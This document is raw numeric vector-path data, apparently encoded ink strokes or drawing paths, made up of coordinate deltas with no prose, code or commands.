0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 1 1,0-1-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 1 1,10-20 417,42-54-291,-44 60-114,0 0 0,0 1-1,1 0 1,1 0 0,0 1 0,1 0 0,0 1 0,1 1 0,0-1 0,0 2-1,1 0 1,0 0 0,0 1 0,17-6 0,-29 12-33,1 0 0,0 1 0,0-1 0,0 0 0,-1 1-1,1 0 1,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0-1,0 1 1,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 1 0,0-1 0,0 1 0,1-1 0,0 4 0,0 1 2,0 1 0,0 0 0,-1 0 0,0 1 0,-1-1 0,1 0 0,-2 10 0,1-6 2,-2 0-10,0 0 0,0-1 0,-1 0 0,0 1 0,-1-1 0,0 0 0,-7 11 0,1 0-12,-10 35-716,16-16-6155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55 1008,'5'-17'3771,"-5"16"-3666,1 1 0,-1 0 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,-1-1 0,-3-8 1595,4 9-1617,0-1 1,0 1 0,0 0-1,0-1 1,0 1 0,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,-1 0 0,1-1-1,0 1 1,0 0 0,0-1-1,-1 1 1,1 0 0,0-1-1,0 1 1,-1 0 0,1 0-1,0-1 1,-1 1-1,1 0 1,0 0 0,-1 0-1,1-1 1,0 1 0,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0-1,-7 0 732,-25 5 1155,1 6-1356,0 2 1,1 1-1,-36 22 1,64-34-577,1 0 1,-1 0-1,0 0 0,1 1 1,-1-1-1,1 1 0,0-1 1,0 1-1,0 0 1,0 0-1,1 0 0,-1 0 1,-1 5-1,-3 9 32,5-17-69,0 1 0,1 0 1,-1 0-1,1 0 1,-1 0-1,1-1 0,-1 1 1,1 0-1,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,1 0-1,-1 0 1,0 0-1,1 0 0,0 2 1,1 0-2,0 0 0,1 1 0,-1-1 1,1 0-1,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,1-1 0,-1 0 0,1 0 1,0 0-1,-1-1 0,1 1 0,0-1 0,0 0 1,0 0-1,8 1 0,3-1-54,1-1-1,0 0 1,0-1-1,16-4 1,35-1-2096,-63 6 1294,0-1 0,0 1 0,0-1 0,-1 0 1,1 0-1,0-1 0,-1 1 0,6-3 1,8-3-3892,3 1 1436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0 596,'-10'15'8092,"5"-9"-7691,-1 0-1,1 1 1,1-1-1,-1 1 1,1 0-1,0 0 1,1 1-1,-5 13 0,-3 11 1215,10-27-1453,1 0 0,-1 0-1,-1-1 1,1 1 0,-1 0-1,1-1 1,-1 0 0,-4 7-1,3-7-79,1 0-1,0 1 0,0-1 0,0 1 0,1 0 0,0-1 0,-1 1 1,1 7-1,-10 38 342,10-46-452,1-1 1,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,1 1-1,0-1 1,0 1 0,-1-1 0,2 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,1-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,5 0 0,-4-1-468,-1 0 0,0 0 1,1-1-1,-1 1 0,0-1 0,0 0 1,1 0-1,-1 0 0,0 0 0,0-1 1,0 1-1,0-1 0,4-3 1,7-2-2688,-1 1 109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1720,'2'6'8176,"1"-1"-4210,-1-4-4106,0 0 1,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1-1,0 1 1,0-1 0,0 0 0,3 0 0,-3 0-1369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36 368,'-9'-6'16094,"10"6"-16069,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 1,0 0-1,0-1 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 1,0 0-1,1-2 0,-1-4 383,-1 24-121,-10 7-167,0 55 112,-10-13-117,20-62-110,1-1 1,-1 0-1,1 0 0,-1 0 1,0 1-1,0-1 0,-1 0 1,-2 5-1,3-5 5,-1 0 1,1 0-1,-1 0 0,1 0 0,0 0 1,0 0-1,1 1 0,-2 5 1,2-7-3,0 0 1,0 0-1,-1 0 0,1 0 1,-1 0-1,1 0 1,-1-1-1,0 1 1,1 0-1,-1 0 1,0-1-1,0 1 0,-3 3 1,3-4-2,0 0-1,0 1 1,0-1 0,0 1-1,0 0 1,0-1 0,1 1-1,-1 0 1,0-1 0,1 1 0,0 0-1,-1 0 1,1 3 0,-11 18 128,11-22-54,-11 24-275,0 17 142,10-35-3685,-3-15-249,-1-22-3861,5 18 4833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50 228,'2'-18'4016,"4"7"-3005,-6 10-923,0 1-1,1-1 1,-1 0 0,0 1 0,0-1-1,1 0 1,-1 1 0,1-1-1,-1 0 1,0 1 0,1-1 0,-1 0-1,1 1 1,0-1 0,-1 1 0,1-1-1,-1 1 1,1 0 0,0-1-1,3 0 3696,40 0-1708,-39-1-2049,1 1-1,0-1 1,0 1-1,0 1 1,0-1-1,0 1 1,0 0 0,0 1-1,0-1 1,0 1-1,0 0 1,0 1-1,0-1 1,-1 1-1,1 0 1,0 1-1,-1-1 1,0 1 0,0 0-1,0 0 1,6 5-1,-10-6-25,16 22 150,-16-22-143,-1-1 0,0 0 0,0 0 1,0 0-1,1 0 0,-1 1 0,-1-1 0,1 0 0,0 0 1,0 0-1,0 0 0,0 1 0,-1-1 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,0 0 0,-1 1 1,-5 6 206,0 0 0,-1-1 0,0 0 0,0 0 0,-1-1 0,0 1 0,0-2 1,-1 0-1,1 0 0,-1 0 0,0-2 0,-1 1 0,-14 3 0,16-6-166,-1 0-1,0 0 0,1-1 1,-12-1-1,-6 0 15,23 1-132,0 1 0,1-1 1,-1 1-1,0 0 0,1 1 1,-1-1-1,1 1 0,-1-1 0,1 1 1,-7 5-1,2-2-1437,6-4 155,9 2-2405,8-12-4647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6 804,'0'0'1571,"-12"-1"3499,10 1-4990,1 1 0,0-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 1 0,0 1 0,-11 28 343,11-21-383,0-8-34,-1 1 0,1 0-1,0-1 1,0 1 0,0 0 0,1 0 0,-1-1-1,1 1 1,-1 0 0,1-1 0,0 1-1,0-1 1,0 1 0,3 4 0,2 9 30,-6-14-33,0-1 0,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 0,1 0 1,-1 1-1,1-1 1,-1 0-1,1 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,0 1 1,3 0-2,-1-1 1,1 0-1,-1 1 1,1-1 0,-1-1-1,1 1 1,0 0 0,0-1-1,-1 0 1,1 0-1,0 0 1,-1 0 0,1-1-1,0 1 1,0-1 0,-1 0-1,4-1 1,8-4 45,-1 0 1,25-14-1,-31 16-20,-8 4-24,1-1-1,0 1 1,0 0-1,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 0,-1-1 1,1 1-1,0-1 1,-1 0-1,1 1 1,0-1-1,-1 1 0,1-1 1,-1 0-1,1 0 1,-1 1-1,0-1 1,1 0-1,-1 0 1,0 0-1,1 1 0,-1-1 1,0 0-1,0 0 1,0 0-1,0-1 1,11-25 803,-11 25-721,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,0 0 0,0 0 1,0 0-1,-2-2 1,-4-5 419,-11-7 734,12 13-1135,0 0 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,1 1 0,-1 0 0,-8 2-1,4-1-85,9-2-17,1 0 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 1,0 0-1,0-1 0,1 1 0,-1 0 0,-2 2 0,-3 4-176,-8 14 177,11 5-3248,3-25 2976,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1-1-1,0 1 1,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,3 2-3085,4-1 572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19 632,'-2'-12'2528,"0"11"-2001,2 1-422,0-1 0,-1 1-1,1 0 1,0-1-1,0 1 1,-1 0 0,1-1-1,0 1 1,-1 0-1,1-1 1,0 1 0,-1 0-1,1 0 1,0 0-1,-1-1 1,1 1 0,-1 0-1,1 0 1,0 0-1,-1 0 1,1-1 0,-1 1-1,1 0 1,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,-1 0-1,1 1 1,-1-1 0,1 0-1,0 0 1,-1 0-1,1 0 1,-1 0 0,1 1-1,0-1 1,-1 0-1,1 0 1,-1 1 0,1-1-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 0-1,-1 1 1,-19 19 1740,18-14-1350,-1 1-1,1-1 1,1 1-1,-1 0 1,0 13-1,-9 41 188,0-19-681,8-22-64,2-20 55,1 1-1,0-1 1,0 1 0,-1-1-1,1 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0-1-1,1 1 1,-1-1-1,0 1 1,0-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,1 2 1,10 14-2541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1 888,'0'0'156,"-1"0"1,1 0-1,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 0,0 0 1,-1 0-1,1 1 0,0-1 1,-1 0-1,1 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 0 1,1 1-1,0-1 0,0 0 0,-1 0 1,1 1-1,0-1 0,0 0 1,0 1-1,0-1 0,-1 0 0,1 1 1,0-1-1,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,1-1 1,-1 0-1,0 1 0,0-1 0,0 0 1,1 1-1,-1-1 0,0 1 1,17 28 92,-5-6 245,-10-19-486,0 0 1,0 0-1,0 0 0,1 0 1,0-1-1,0 1 0,0-1 1,0 0-1,1 1 1,-1-2-1,1 1 0,6 4 1,-9-7 1,30 15-997,-29-15 801,-1 1 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1-1 0,9-5-2605,-2 2 1296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0 252,'0'0'5153,"-11"8"-2091,8-3-2731,1 0 1,-1 0 0,0 0-1,0 0 1,0-1 0,-1 1-1,1-1 1,-7 6-1,-10 14 727,-39 39 616,44-48-1486,-1 0 0,-13 20 0,-7 3 130,29-32-290,0 0 0,1 1 1,-1 0-1,-7 11 0,-15 13-568,28-30 282,22-21-5965,1-4 899,-12 7 2631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13 160,'0'-10'5954,"-2"8"-5816,-1 2 130,0 1-1,0-1 1,0 1-1,0 0 1,0 0 0,0 0-1,1 1 1,-1-1 0,0 1-1,1-1 1,-1 1-1,1 0 1,-5 4 0,-33 37 2171,28-29-2043,5-5-134,1 0 0,1-1 0,0 2-1,-5 9 1,6-9 15,-1-1 1,0 0-1,-1 0 0,-6 8 0,10-13-211,-1-1-1,1 1 1,0 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,0 7 0,-10 24 207,10-34-269,0 0-1,0 1 1,0-1-1,1 0 1,-1 0 0,0 0-1,1 1 1,-1-1-1,1 0 1,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1 0,1-1-1,-1 0 1,0 1-1,1-1 1,-1 0-1,1 1 1,-1-1 0,1 0-1,0 0 1,-1 0-1,1 0 1,0 1-1,0-1 1,0 0 0,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,0 0 1,0-1 0,1 1-1,-1-1 1,0 1-1,0-1 1,1 1-1,1 0 1,2 0-11,0 1 0,1-1-1,-1 0 1,1-1 0,-1 1 0,0-1 0,1 0-1,-1-1 1,1 1 0,6-2 0,9-3-471,10-3-2306,-6-8-4948,-16 10 4811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69 688,'0'0'96,"0"1"1,0 0-1,0 0 0,-1 0 0,1 0 1,0 0-1,1 0 0,-1 0 0,0 0 1,0-1-1,0 1 0,0 0 0,1 0 1,-1 0-1,0 0 0,1 0 0,-1-1 1,1 1-1,-1 0 0,1 0 0,-1-1 0,1 1 1,-1 0-1,1-1 0,0 1 0,0 0 1,0 0-1,13 11 939,-13-10-1016,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0-1-1,0 1 1,1 0 0,-1-1 0,0 1 0,0 0-1,1-1 1,1 1 0,8 2 78,0 0 0,0-1 1,0-1-1,0 0 0,0 0 0,0-1 0,0-1 0,1 1 0,-1-2 0,0 0 1,0 0-1,-1-1 0,1 0 0,0-1 0,18-9 0,-28 13-67,0-1 0,0 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,0-1 0,-1 1 0,1-1-1,0 1 1,-1-1 0,1 0-1,0 1 1,-1-1 0,1 0 0,-1 0-1,1 0 1,-1 1 0,0-1-1,1 0 1,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 1 1,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,-1 0-1,1 0 1,0-1 0,-2-1 158,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,-1 0 0,1 0 1,-1 0-1,-5-4 0,0 2 185,1-1 0,-1 1 0,-1 0 0,1 1 0,0 0 0,-1 0 0,0 0 0,-16-1 0,-5 1 1,27 2-400,0 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1-1,-1-1 1,0 1 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,-4 3 0,3-2-541,-2 4-202,4 2-5744,1-4 3923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39 612,'-5'2'360,"1"0"-1,0 0 1,0 1 0,0 0 0,0-1-1,0 2 1,0-1 0,1 0-1,0 1 1,-1 0 0,1-1-1,1 1 1,-4 6 0,0 9-35,6-19-311,-1 1-1,1 0 1,-1 0-1,1 0 1,0-1-1,-1 1 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,1 0 1,-1 0-1,0 0 1,0 0-1,1 0 1,-1 0 0,0-1-1,1 1 1,-1 0-1,1 0 1,-1 0-1,1-1 1,-1 1-1,1 0 1,1 1-1,10 13 158,-9-10-160,0-1-1,0 1 1,1-1 0,-1 0 0,1 0-1,0 0 1,0 0 0,1-1-1,-1 0 1,1 0 0,7 4 0,-8-6-9,-1-1 1,1 1 0,-1-1 0,1 0 0,-1 0 0,0 0-1,1 0 1,-1-1 0,1 0 0,-1 1 0,0-1-1,1-1 1,-1 1 0,0 0 0,0-1 0,0 1-1,0-1 1,0 0 0,0 0 0,0 0 0,-1 0 0,1-1-1,-1 1 1,4-5 0,8-5 15,-13 11-3,0 0 1,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,-1 0 0,1-1 0,0 1-1,-1-1 1,1 1 0,-1-1 0,0 1 0,1-3-1,4-13 132,-4 17-137,-1 0-1,0-1 0,0 1 1,1-1-1,-1 1 1,0-1-1,0 1 1,1-1-1,-1 1 0,0-1 1,0 0-1,0 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 1 1,0-1-1,-1 1 1,1-1-1,0 1 0,0-1 1,-1 1-1,1-1 1,0 1-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1 0 0,0-1 1,-1 1-1,0-1 1,0 0 24,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1-19,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 1 0,0-1-1,0 0 1,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,-1 0-1,1 1 1,0-1 0,0 1-1,-1-1 1,1 0 0,0 1-1,-1-1 1,1 1-1,-1-1 1,1 1 0,-1 0-1,1-1 1,-1 1 0,0-1-1,-2-11 472,1 11-379,1 0-1,0 1 0,-1-1 1,1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,1 0 1,-1-1-1,0 1 1,1 0-1,-1-1 0,1 1 1,-1 0-1,1-3 1,-1 3-5,0 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 1,1 0-1,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 1,-1-1-1,0 1 0,1 0 0,-4-1 0,2-3 185,0 1-241,-25 16 109,-21 19 31,47-30-152,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 4 0,-4 8 64,5-15-97,-1 1 0,1-1 1,0 0-1,0 1 0,-1-1 0,1 0 1,0 1-1,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,-1 0 1,1 1-1,0-1 0,0 1 0,0-1 1,0 1-1,1-1 0,-1 0 0,0 1 1,0-1-1,0 1 0,0-1 0,0 0 1,0 1-1,1-1 0,-1 1 0,0-1 1,0 0-1,1 1 0,-1-1 1,0 0-1,1 1 0,-1-1 0,0 0 1,1 1-1,-1-1 0,1 0 0,8 12 24,-7-10-20,-1 0 1,0 0-1,0-1 0,1 1 0,-1 0 0,1-1 0,-1 0 1,1 1-1,0-1 0,-1 0 0,1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 0 0,4 0 0,10-1-1,0-1-1,-1 0 0,18-5 0,-18 3 15,0 1-1,1 0 1,16 1-1,-30 2-48,-1-1 23,-1 1 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 1,-1 1-1,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0 0 0,-2 0-12,1 1-1,-1 0 1,0 0-1,1 0 1,-1 0 0,1 0-1,-1 1 1,1-1-1,0 0 1,0 1 0,0-1-1,1 1 1,-1-1 0,0 1-1,1-1 1,-1 5-1,-11 23-2755,1-11-4571,2-13 4991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7 392,'0'0'1995,"-13"-6"6144,12 6-8040,-1 0 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,-1 1 1,1-1-1,0 1 0,0-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,0 1 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,1 1 1,-1 0-1,0 1 0,0-1 0,1 0 1,-2 2-1,-17 21-45,17-22 0,1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 1,1 1-1,-1 0 0,0-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1 0 0,0 2 0,11 55-63,-11-57 11,0 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,-1 0 1,1 1-1,0-1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 1,0-1-1,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 1,4 0-1,5 1 4,1 0 0,-1-1 1,1 0-1,15-1 0,-17 0 13,-8 0-18,1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-1-1,-1 1 1,1 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-2 0,2-3 3,-1-1 0,-1 1 0,1-1 0,-1 1 0,0-1 1,-1-9-1,0 15 17,-1 0 0,1 1 0,0-1 0,-1 1 0,0-1 0,1 0 0,-1 1 1,0-1-1,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 0,-3-1 0,0 0 120,1 1 0,-1-1 0,0 1 1,0-1-1,1 1 0,-1 0 0,0 1 0,-8-2 0,-12 3-62,-1 0 0,1 2 0,-1 0-1,-27 9 1,50-12-106,1 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 1-1,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,1 0 1,-1 0-1,1 1 0,0-1 0,-1 0 1,1 0-1,0 2 0,-10 19-2730,8-17 1582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8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31 1092,'2'-11'4257,"1"9"-4053,-3 2-94,1 0-1,-1 0 0,1 0 0,-1 0 1,0-1-1,1 1 0,-1 0 1,0 0-1,1-1 0,-1 1 1,0 0-1,0-1 0,1 1 1,-1 0-1,0-1 0,0 1 0,0 0 1,1-1-1,-1 1 0,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0-1 0,0 1 0,0 0 1,0-1-1,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,6-4 457,-11 5 143,4 0-208,-6 14 260,0 0 35,0 0-1,-1 0 1,-17 23-1,22-34-714,1 1 1,0-1-1,0 1 1,0 0-1,0 0 1,1 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,0 6-1,-1 54 322,2-48-365,0 81 20,0-96-95,0 1 0,1-1 1,-1 0-1,0 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 1,1 0-1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 0,1-1 0,-1 0 0,2 1 0,-2-1-202,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,0-1 1,1 0-1,-1 0-198,-1 0 0,1 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0 0-1,0-1 1,0-1 0,0-3-2528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9 137 896,'0'0'1585,"-1"-29"2762,-1 28-4592,-4-3 2241,15 2 1376,-7-11-1380,16-6-1345,-17 17-643,1 0 0,-1 0-1,1-1 1,0 1 0,0 0 0,0 0 0,0 1 0,0-1 0,4-2 0,4-6 21,-9 8-24,0 0 0,0 1 0,0-1 0,1 0 0,-1 1 1,1-1-1,-1 1 0,1 0 0,0-1 0,0 1 0,-1 0 1,4-1-1,-3 1-5,0 0-1,5-3-4,-5 3 11,-1 0 0,1 0 1,0 1-1,0-1 0,0 1 1,0 0-1,0-1 0,0 1 1,0 0-1,0 0 0,0 0 0,3 1 1,14-3 1,-15 1 0,0 0-1,0 0 1,0 0-1,0 1 1,0 0-1,0 0 1,0 0 0,0 0-1,0 1 1,0 0-1,0-1 1,0 1-1,0 1 1,0-1-1,0 1 1,4 1-1,4 2 9,-11-5-10,1 0-1,-1 0 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,1 1-1,-1-1 1,0 1-1,0 0 1,1 0-1,-1-1 1,0 1-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 1 1,-1-1-1,1 0 1,0 0-1,-1 0 1,1 1-1,0-1 1,-1 0-1,0 1 1,1-1-1,-1 2 1,0-2 10,0 49 77,0-46-83,-1-1-1,0 1 1,0 0-1,0 0 1,0 0-1,-1-1 1,0 1-1,1-1 1,-1 1-1,-1-1 1,1 0-1,0 0 1,-1 0-1,1 0 1,-6 4-1,-35 37 182,22-23-203,18-16 14,-1-1-1,1 0 0,-1 0 1,-1 0-1,1 0 0,-8 4 1,11-7 11,0-1-5,0 1-1,-1 0 1,1 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0-1,0 0 1,1 0 0,-1 1-1,0-1 1,1 0 0,-1 0-1,1 1 1,-1-1 0,1 1-1,0-1 1,-1 0 0,1 1-1,0-1 1,0 1 0,0 2-1,35 21 86,-33-23-87,1 0 0,-1 0 0,1-1 1,0 1-1,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,4 0 0,-4 0-1,1 0 0,-1 0-1,1 0 1,-1 1-1,0-1 1,1 1-1,-1-1 1,0 1-1,0 0 1,4 4-1,12 8-7,-16-12 5,0-1 0,0 1-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 1 0,-1-1-1,0 1 1,2 3-1,1 7-6,-5-12 13,0 0 0,1-1-1,-1 1 1,0-1 0,0 1 0,1 0 0,-1-1-1,0 1 1,0 0 0,0-1 0,0 1 0,0-1-1,0 1 1,0 0 0,0-1 0,0 1 0,0 0-1,0-1 1,0 1 0,0 0 0,-1-1 0,1 1-1,0 0 1,0-1 0,-1 1 0,1-1 0,0 1-1,-1-1 1,1 1 0,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,1 0 1,-2 1 0,-5 6 80,0-1 0,0 1 0,-1-1 0,0-1 0,0 0 0,0 0-1,-1 0 1,1-1 0,-1 0 0,0-1 0,-1 0 0,1-1 0,-13 3 0,-27 0 437,15 0-1899,11-3-3762,32-10-201,-5 4 2782,5-2-175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33 560,'1'-1'245,"-1"1"1,0-1-1,0 1 0,0-1 1,0 0-1,1 1 0,-1-1 1,0 0-1,0 1 0,0-1 1,-1 1-1,1-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,-1 1 0,1-1 1,0 0-1,-1 1 0,1-1 1,0 1-1,-1-1 0,1 1 1,0 0-1,-1-1 0,1 1 1,-1-1-1,1 1 0,-1 0 1,1-1-1,-1 1 0,0-1 1,-1 1-183,-2-9 2948,4 9-2979,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,0 0 1,0 0 0,-1-1-1,1 1 1,0 0 0,0 0-1,0 0 1,0 0 0,0 0-1,0-1 1,0 1 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0-1 0,0 1-1,0 0 1,0 0 0,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 1-1,0-1 1,0 0 0,0 0-1,0 0 1,0 1 0,6 4 359,-1-3-2304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54 146 308,'0'0'601,"-10"-1"1160,10 2-1371,-17 2 4104,23 0-3637,-9-1-244,-2 1-236,11-2-136,-4-1 249,1 1-377,1-1-1,-1 1 1,0-1 0,1 0-1,-1 0 1,1 0-1,-1 0 1,0-1 0,1 1-1,-1-1 1,0 0-1,1 0 1,-1 0 0,0 0-1,0-1 1,0 1 0,6-4-1,18-9-125,-20 11 12,0 0 1,-1-1-1,1 0 0,-1 0 0,0 0 1,0-1-1,10-9 0,0 5 2,-15 8-1,1 1 1,-1-1-1,1 0 0,-1 1 1,1-1-1,-1 0 1,1 0-1,-1 0 0,0 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 0,1-3 1,2-2-1,-4 6 1,1-1 0,0 0 0,0 1 